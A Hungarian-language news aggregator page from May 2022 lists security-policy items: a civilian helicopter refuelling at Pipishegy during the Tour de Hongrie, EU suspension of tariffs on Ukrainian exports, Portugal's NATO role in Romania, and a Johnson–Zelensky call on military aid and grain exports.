Május közepén, néhány nappal az után, hogy a honvédség helikopterei a Pipishegyen gyakoroltak, egy újabb forgószárnyas kereste fel a Mátrában meghúzódó repteret. Ezúttal egy civil helikopter járt ott, a honvédség által is használt AS 350 Ecureuil megnövelt felszálló tömegű, két hajtóműves, AS 355F2 Ecureuil 2-es változata. A budaörsi bázisú magyar gép kamera platformként kísérte az idei Tour de Hongrie nemzetközi kerékpáros verseny mezőnyét. (Tavaly egy Bo-105-ös végezte ugyanezt a munkát.) A helikopterre függesztett kamera képét a Mátra felett nagy magasságban repülő francia Beech 200 King Air fedélzetére továbbították, majd onnan sugározták a televíziós társaságokhoz. A helikopter három alkalommal szállt le tankolni Pipishegyen. Kétszer járó hajtóművek mellett töltötték újra, hogy mihamarabb a mezőny után repülhessen, a harmadik tankolásra már a hazarepülés miatt volt szükség.

[...] Bővebben!


Categories: Biztonságpolitika

Orosz agresszió: Az EP jóváhagyta az ukrán exportra kivetett valamennyi uniós vám felfüggesztését

Biztonságpiac - Mon, 05/23/2022 - 06:35
Az Európai Parlament (EP) jóváhagyta csütörtökön az Európai Bizottság javaslatát, hogy az Európai Unió egy évre függessze fel az EU-ba irányuló valamennyi ukrán exportra, köztük az acélexportra kivetett dömpingellenes és importvámot, és minden vonatkozó uniós védintézkedést.

Az EP közleménye szerint a brüsszeli plenáris ülésen 515 szavazattal, 32 ellenszavazat és 11 tartózkodás mellett az EP-képviselők hozzájárultak ahhoz, hogy az Ukrajna elleni orosz háború hatásai ne akadályozzák az ország kereskedelmi képességét.

Az intézkedéssel az EU egy évre teljes mértékben felfüggeszti az ipari termékekre kivetett importvámokat, a gyümölcs- és zöldségfélékre kivetett behozatali vámokat, valamint az acélexportra kivetett uniós dömpingellenes és importvámot, és minden vonatkozó védintézkedést. A lépés célja, hogy megkönnyítse Ukrajna unióba irányuló exportjának fellendítését, ami enyhíteni fogja az ukrán termelők és exportőrök helyzetét is.

Az intézkedéssel az EU vám nélküli, teljes hozzáférést biztosít Ukrajnának az uniós piachoz. Az EU emellett intézkedéseket hoz a szárazföldi árufuvarozás megkönnyítésére, hogy segítse az ukrán termékek szállítását.

Az intézkedést az EP után még az Európai Unió Tanácsának is meg kell vizsgálnia, majd jóvá kell hagynia.

 

The post Orosz agresszió: Az EP jóváhagyta az ukrán exportra kivetett valamennyi uniós vám felfüggesztését appeared first on .

Categories: Biztonságpolitika

Costa: Portugália készen áll a NATO-feladatainak elvégzésére

Biztonságpiac - Mon, 05/23/2022 - 05:35
A portugál fegyveres erők készen állnak a NATO főparancsnoksága által rájuk bízott feladatok teljesítésére – jelentette ki a romániai hivatalos látogatásán levő Antonio Costa portugál miniszterelnök.

Portugália széles körű kötelezettséget vállalt az Egyesült Nemzetek Szervezetével, az Európai Unióval és a NATO-val szemben, hogy jelen legyen fegyveres erőivel ott, ahol szükséges, mondta Costa a román kormányfővel közösen tartott sajtótájékoztatón.

Véleménye szerint nagyon fontos, hogy ne hagyják figyelmen kívül azt a globális kihívást, amelyet az Oroszország által a NATO keleti határán elkövetett katonai agresszió jelent.

‘Portugália mindig szívesen vett részt a NATO-missziókban, a balti országok védelmében és a keleti szárnyon egyaránt. Sok éve intenzíven együttműködünk a román fegyveres erőkkel, közös projektjeink voltak például a román és portugál tisztek képzése terén a közös cselekvési képesség fejlesztése érdekében’ – szögezte le a portugál kormányfő.

Arra a kérdésre, hogy a portugál erők romániai jelenlétét meg lehet-e hosszabbítani, Costa azt válaszolta, hogy amennyiben szükséges lesz, igen.

‘Úgy döntöttünk, hogy megerősítjük a NATO elrettentő képességét Romániában, és ha az Európai Főparancsnokság szükségesnek és megfelelőnek tartja a misszió meghosszabbítását, folytatódni fog a küldetés’ – mondta a portugál kormányfő az AGERPRES hírügynökség szerint.

Vasile Dîncu román és Helena Carreiras portugál védelmi miniszter csütörtökön Bukarestben aláírta a Románia kormánya és a Portugál Köztársaság kormánya közötti védelmi együttműködési megállapodást. A védelmi minisztérium arról tájékoztatta az AGERPRES hírügynökséget, hogy ez a megállapodás hozzá fog járulni egyrészt a két ország közötti kétoldalú védelmi együttműködés, másrészt pedig a NATO és az EU keretében megvalósuló együttműködés megerősítéséhez, megteremtve ezzel a román-portugál kapcsolatok megszilárdításának feltételeit, amelyek mind európai, mind szövetségi szinten konvergens célkitűzéseken alapulnak.

The post Costa: Portugália készen áll a NATO-feladatainak elvégzésére appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: Ukrajna további katonai támogatásáról is tárgyalt Johnson és Zelenszkij

Biztonságpiac - Sun, 05/22/2022 - 08:35
Az Ukrajnának nyújtandó további brit katonai támogatásról és a globális élelmiszer-ellátási biztonságról, ezen belül az ukrán exportútvonalak megnyitásának lehetőségéről tárgyalt csütörtökön Boris Johnson brit miniszterelnök és Volodimir Zelenszkij ukrán államfő.

A Downing Street szóvivőjének beszámolója szerint a telefonos megbeszélésen Zelenszkij tájékoztatta Johnsont a Donyec-medence helyzetéről és arról a folytatódó küzdelemről, amelynek célja “Ukrajna teljes szuverén területének visszaszerzése”, valamint a harcok térségében terjesztett orosz álinformációkkal szembeni fellépés.

A londoni miniszterelnöki hivatal tájékoztatása szerint Johnson kifejezésre juttatta “az ostromlott Mariupol bátor védői iránt érzett, nem halványuló csodálatát”, egyben felszólította Oroszországot, hogy a hadifoglyokkal az őket megillető méltósággal és tisztelettel bánjon.

A megbeszélésen a brit kormányfő felidézte, hogy London a minap 1,3 milliárd font (csaknem 600 milliárd forint) értékű újabb katonai segélycsomagot állított össze Ukrajna számára. A Downing Street szóvivője szerint a csomagban ezúttal messzehordó tüzérségi eszközök, hajók ellen bevethető szárazföldi indítású rakéták és drónok szerepelnek.

Nagy-Britannia régóta Ukrajna egyik legnagyobb nyugati fegyverellátója, és az orosz háború február végi kezdete óta is több száz hordozható légvédelmi rakétarendszert, páncéltörő rakétákat, egyéb precíziós rakétafegyverzeti eszközöket, 120 páncélozott járművet, hajók ellen bevethető rakétarendszereket, az ukrán erők ellátására szolgáló, nagy teherbírású drónokat, több ezer éjjellátó berendezést és tüzérségi ütegek lokalizálására alkalmas radarrendszereket adott át az ukrán hadseregnek.

A csütörtöki telefonos megbeszélésen Johnson és Zelenszkij megállapodott arról is, hogy erősítik az együttműködést a szövetséges országokkal, köztük az Egyesült Államokkal, Franciaországgal és Németországgal az Ukrajna számára hosszabb távon kidolgozandó biztonsági struktúra elemeinek meghatározása érdekében.

A brit kormányfő a Downing Street szóvivőjének beszámolója szerint komoly aggályainak adott hangot amiatt, hogy Putyin “gyáva, semmivel nem törődő módon” blokád alatt tartja Ukrajna fekete-tengeri kikötőit, és emiatt a fejlődő térségben is drágulnak az élelmiszerek.

A brit miniszterelnök és az ukrán államfő áttekintette, hogy milyen lehetőségek vannak a kritikus fontosságú szárazföldi és tengeri útvonalak megnyitására az ukrajnai gabona exportja előtt, és kölcsönösen kötelezettséget vállaltak arra, hogy utasítják stábjaikat a következő lépések sürgős meghatározására.

A Morgan Stanley globális pénzügyi szolgáltató konglomerátum feltörekvő piacokkal foglalkozó londoni elemzőstábjának friss kimutatása szerint Ukrajna fekete-tengeri kikötőiből az ukrán gabonaexport csaknem 90 százaléka, a napraforgóolaj-kivitel hetven százaléka, a fémexportnak több mint a fele indult a célállomások felé az átfogó orosz támadás előtt.

A ház szerint ha Ukrajna hosszabb időre elveszíti hozzáférését e kikötőkhöz, az ukrán hazai össztermék (GDP) az idén hatvan százalékkal is zuhanhat, és az ukrán gazdaság teljesítménye csak 2030-ra vagy még később érné el újból a háború előtti szintet.

 

The post Orosz agresszió: Ukrajna további katonai támogatásáról is tárgyalt Johnson és Zelenszkij appeared first on .

Categories: Biztonságpolitika

Pages

THIS IS THE NEW BETA VERSION OF EUROPA VARIETAS NEWS CENTER - under construction
the old site is here

Copy & Drop - Can`t find your favourite site? Send us the RSS or URL to the following address: info(@)europavarietas(dot)org.